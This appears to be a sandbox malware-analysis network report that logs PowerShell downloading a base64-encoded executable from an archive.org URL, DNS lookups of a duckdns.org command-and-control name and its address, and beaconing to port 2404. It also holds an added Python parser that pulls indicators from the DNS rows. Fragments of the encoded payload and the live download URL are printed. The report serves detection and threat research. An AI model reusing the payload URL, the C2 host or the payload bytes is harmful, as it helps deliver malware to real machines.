Sep 26, 2024 11:00:06.251286983 CEST  52131  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:06.256167889 CEST  2404  52131  181.236.206.3  192.168.2.6
Sep 26, 2024 11:00:06.970881939 CEST  52132  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:06.975812912 CEST  2404  52132  181.236.206.3  192.168.2.6
Sep 26, 2024 11:00:06.976263046 CEST  52132  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:06.976501942 CEST  52132  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:06.981306076 CEST  2404  52132  181.236.206.3  192.168.2.6
Sep 26, 2024 11:00:08.621799946 CEST  2404  52132  181.236.206.3  192.168.2.6
Sep 26, 2024 11:00:08.621869087 CEST  52132  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:08.732546091 CEST  52132  2404  192.168.2.6  181.236.206.3
Sep 26, 2024 11:00:08.738679886 CEST  2404  52132  181.236.206.3  192.168.2.6
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 26, 2024 10:58:03.179666996 CEST  60306  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:58:03.327965975 CEST  53  60306  1.1.1.1  192.168.2.6
Sep 26, 2024 10:58:06.370064020 CEST  52233  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:58:06.379019022 CEST  53  52233  1.1.1.1  192.168.2.6
Sep 26, 2024 10:58:07.850943089 CEST  56413  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:58:08.844839096 CEST  56413  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:58:09.479543924 CEST  53  56413  1.1.1.1  192.168.2.6
Sep 26, 2024 10:58:09.479566097 CEST  53  56413  1.1.1.1  192.168.2.6
Sep 26, 2024 10:58:42.839009047 CEST  53  61576  162.159.36.2  192.168.2.6
Sep 26, 2024 10:58:43.339013100 CEST  53  53837  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:10.487037897 CEST  59461  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:11.501614094 CEST  59461  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:12.518511057 CEST  59461  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:14.532416105 CEST  59461  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:16.255606890 CEST  53  59461  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:16.255630970 CEST  53  59461  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:16.255646944 CEST  53  59461  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:16.255657911 CEST  53  59461  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:17.267355919 CEST  53235  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:18.267319918 CEST  53235  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:19.285393953 CEST  53235  53  192.168.2.6  1.1.1.1
Sep 26, 2024 10:59:20.951941013 CEST  53  53235  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:20.951961040 CEST  53  53235  1.1.1.1  192.168.2.6
Sep 26, 2024 10:59:20.951976061 CEST  53  53235  1.1.1.1  192.168.2.6
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Sep 26, 2024 10:58:03.179666996 CEST  192.168.2.6  1.1.1.1  0x40d7  Standard query (0)  ia600100.us.archive.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:06.370064020 CEST  192.168.2.6  1.1.1.1  0xd1a4  Standard query (0)  paste.ee  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:07.850943089 CEST  192.168.2.6  1.1.1.1  0xe6a3  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:08.844839096 CEST  192.168.2.6  1.1.1.1  0xe6a3  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:10.487037897 CEST  192.168.2.6  1.1.1.1  0x1927  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:11.501614094 CEST  192.168.2.6  1.1.1.1  0x1927  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:12.518511057 CEST  192.168.2.6  1.1.1.1  0x1927  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:14.532416105 CEST  192.168.2.6  1.1.1.1  0x1927  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:17.267355919 CEST  192.168.2.6  1.1.1.1  0x33cf  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:18.267319918 CEST  192.168.2.6  1.1.1.1  0x33cf  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:19.285393953 CEST  192.168.2.6  1.1.1.1  0x33cf  Standard query (0)  newssssssssssssss.duckdns.org  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Sep 26, 2024 10:58:03.327965975 CEST  1.1.1.1  192.168.2.6  0x40d7  No error (0)  ia600100.us.archive.org  -  207.241.227.240  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:06.379019022 CEST  1.1.1.1  192.168.2.6  0xd1a4  No error (0)  paste.ee  -  188.114.97.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:06.379019022 CEST  1.1.1.1  192.168.2.6  0xd1a4  No error (0)  paste.ee  -  188.114.96.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:09.479543924 CEST  1.1.1.1  192.168.2.6  0xe6a3  No error (0)  newssssssssssssss.duckdns.org  -  181.236.206.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:58:09.479566097 CEST  1.1.1.1  192.168.2.6  0xe6a3  No error (0)  newssssssssssssss.duckdns.org  -  181.236.206.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:16.255606890 CEST  1.1.1.1  192.168.2.6  0x1927  Server failure (2)  newssssssssssssss.duckdns.org  none  none  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:16.255630970 CEST  1.1.1.1  192.168.2.6  0x1927  Server failure (2)  newssssssssssssss.duckdns.org  none  none  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:16.255646944 CEST  1.1.1.1  192.168.2.6  0x1927  Server failure (2)  newssssssssssssss.duckdns.org  none  none  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:16.255657911 CEST  1.1.1.1  192.168.2.6  0x1927  Server failure (2)  newssssssssssssss.duckdns.org  none  none  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:20.951941013 CEST  1.1.1.1  192.168.2.6  0x33cf  No error (0)  newssssssssssssss.duckdns.org  -  181.236.206.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:20.951961040 CEST  1.1.1.1  192.168.2.6  0x33cf  No error (0)  newssssssssssssss.duckdns.org  -  181.236.206.3  A (IP address)  IN (0x0001)  false
Sep 26, 2024 10:59:20.951976061 CEST  1.1.1.1  192.168.2.6  0x33cf  No error (0)  newssssssssssssss.duckdns.org  -  181.236.206.3  A (IP address)  IN (0x0001)  false
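The two DNS tables carry the indicators that matter for this sample: an archive.org mirror and paste.ee are looked up first (the staging hosts for the next stage), then a duckdns.org name that resolves to 181.236.206.3, the address the C2 traffic goes to. At 10:59:10 the client re-sends the same query four times under transaction ID 0x1927 and gets four SERVFAIL replies before a fresh query (0x33cf) succeeds; dynamic-DNS names that flap like this are typical of free-tier C2 hosting. The Python below is an added example, not part of the report: it parses the rows exactly as exported above and produces the findings an analyst would pull from them. The lists of dynamic-DNS zones and paste services are an assumption beyond the two the report shows.

```python
import re
from collections import Counter, defaultdict

# DNS query and answer rows copied from the two tables above.  The export runs the
# columns together: timestamp, source IP, dest IP, transaction ID, op/reply code,
# name, [cname, address,] record type, class, DNS-over-HTTPS flag.
DNS_ROWS = """\
Sep 26, 2024 10:58:03.179666996 CEST192.168.2.61.1.1.10x40d7Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
Sep 26, 2024 10:58:06.370064020 CEST192.168.2.61.1.1.10xd1a4Standard query (0)paste.eeA (IP address)IN (0x0001)false
Sep 26, 2024 10:58:07.850943089 CEST192.168.2.61.1.1.10xe6a3Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
Sep 26, 2024 10:59:10.487037897 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
Sep 26, 2024 10:59:11.501614094 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
Sep 26, 2024 10:58:03.327965975 CEST1.1.1.1192.168.2.60x40d7No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
Sep 26, 2024 10:58:06.379019022 CEST1.1.1.1192.168.2.60xd1a4No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
Sep 26, 2024 10:58:09.479543924 CEST1.1.1.1192.168.2.60xe6a3No error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
Sep 26, 2024 10:59:16.255606890 CEST1.1.1.1192.168.2.60x1927Server failure (2)newssssssssssssss.duckdns.orgnonenoneA (IP address)IN (0x0001)false
"""

LOCAL_IP = "192.168.2.6"   # the analysis VM, from the report
# Zone lists are an assumption: the report itself only shows duckdns.org and paste.ee.
DYNDNS_ZONES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
PASTE_HOSTS = ("paste.ee", "pastebin.com")

ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{9}) [A-Z]+"
    r"(?P<ips>[\d.]+)(?P<txid>0x[0-9a-f]{4})(?P<code>[A-Za-z ]+ \(\d+\))"
    # Name labels are lower-case; the TLD is matched lazily so that a trailing
    # address or the literal "nonenone" is not swallowed into it.
    r"(?P<name>[a-z0-9-]+(?:\.[a-z0-9-]+)*?\.[a-z]+?)"
    r"(?P<rdata>\d{1,3}(?:\.\d{1,3}){3}|nonenone)?"
    r"(?=[A-Z])(?P<rtype>[A-Z]+ \([^)]*\))(?P<cls>IN \(0x[0-9a-f]{4}\))(?P<doh>true|false)$"
)


def parse_dns(text):
    """Turn the flattened rows into dicts; direction is decided by which side is the VM."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ROW_RE.fullmatch(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        ips = m["ips"]
        if ips.startswith(LOCAL_IP):            # query: sandbox -> resolver
            kind, resolver = "query", ips[len(LOCAL_IP):]
        elif ips.endswith(LOCAL_IP):            # answer: resolver -> sandbox
            kind, resolver = "answer", ips[: -len(LOCAL_IP)]
        else:
            raise ValueError(f"neither side is {LOCAL_IP}: {line!r}")
        rdata = m["rdata"]
        events.append({
            "kind": kind, "resolver": resolver, "txid": m["txid"],
            "code": m["code"], "name": m["name"],
            "address": None if rdata in (None, "nonenone") else rdata,
        })
    return events


def dns_findings(events):
    """Indicators an analyst would pull from the DNS tables: resolved addresses,
    dynamic-DNS and paste-service hosts, and query retries that ended in SERVFAIL."""
    resolved = defaultdict(set)
    for e in events:
        if e["kind"] == "answer" and e["address"]:
            resolved[e["name"]].add(e["address"])
    findings = []
    for name in sorted({e["name"] for e in events}):
        addrs = ", ".join(sorted(resolved.get(name, ()))) or "unresolved"
        if name.endswith(DYNDNS_ZONES):
            findings.append(f"dynamic DNS host {name} -> {addrs}")
        if name in PASTE_HOSTS or name.endswith(tuple("." + h for h in PASTE_HOSTS)):
            findings.append(f"paste service {name} -> {addrs}")
    # The same transaction ID re-sent more than once means the resolver did not
    # answer in time; pair that with a SERVFAIL and the C2 name was flapping.
    sent = Counter((e["txid"], e["name"]) for e in events if e["kind"] == "query")
    failed = {(e["txid"], e["name"]) for e in events
              if e["kind"] == "answer" and e["code"].startswith("Server failure")}
    for (txid, name), n in sorted(sent.items()):
        if n > 1 and (txid, name) in failed:
            findings.append(f"{n} retries of {txid} for {name} ended in SERVFAIL")
    return findings, dict(resolved)


if __name__ == "__main__":
    for finding in dns_findings(parse_dns(DNS_ROWS))[0]:
        print(finding)
```

The name/address boundary is the fragile part of this layout: an A record answer is "name" immediately followed by the dotted quad, so the TLD has to be matched lazily and anchored on the upper-case record type that follows, otherwise "duckdns.orgnonenone" is read as one label. The resolved map this returns is what you would feed into the TCP parser's known-remote set.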
                                      • ia600100.us.archive.org
                                      • paste.ee
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.6  49711  207.241.227.240  443  6784  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-09-26 08:58:03 UTC  109  OUT  GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                      Host: ia600100.us.archive.org
                                      Connection: Keep-Alive
2024-09-26 08:58:04 UTC  606  IN  HTTP/1.1 200 OK
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Thu, 26 Sep 2024 08:58:04 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 2823512
                                      Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                      Connection: close
                                      ETag: "66e22cba-2b1558"
                                      Strict-Transport-Security: max-age=15724800
                                      Expires: Thu, 26 Sep 2024 14:58:04 GMT
                                      Cache-Control: max-age=21600
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                      Access-Control-Allow-Credentials: true
                                      Accept-Ranges: bytes
                                      2024-09-26 08:58:04 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                      Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                      2024-09-26 08:58:04 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                      Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                      Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                      Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                      Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                      Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                      2024-09-26 08:58:04 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                      Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                      2024-09-26 08:58:04 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                      Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
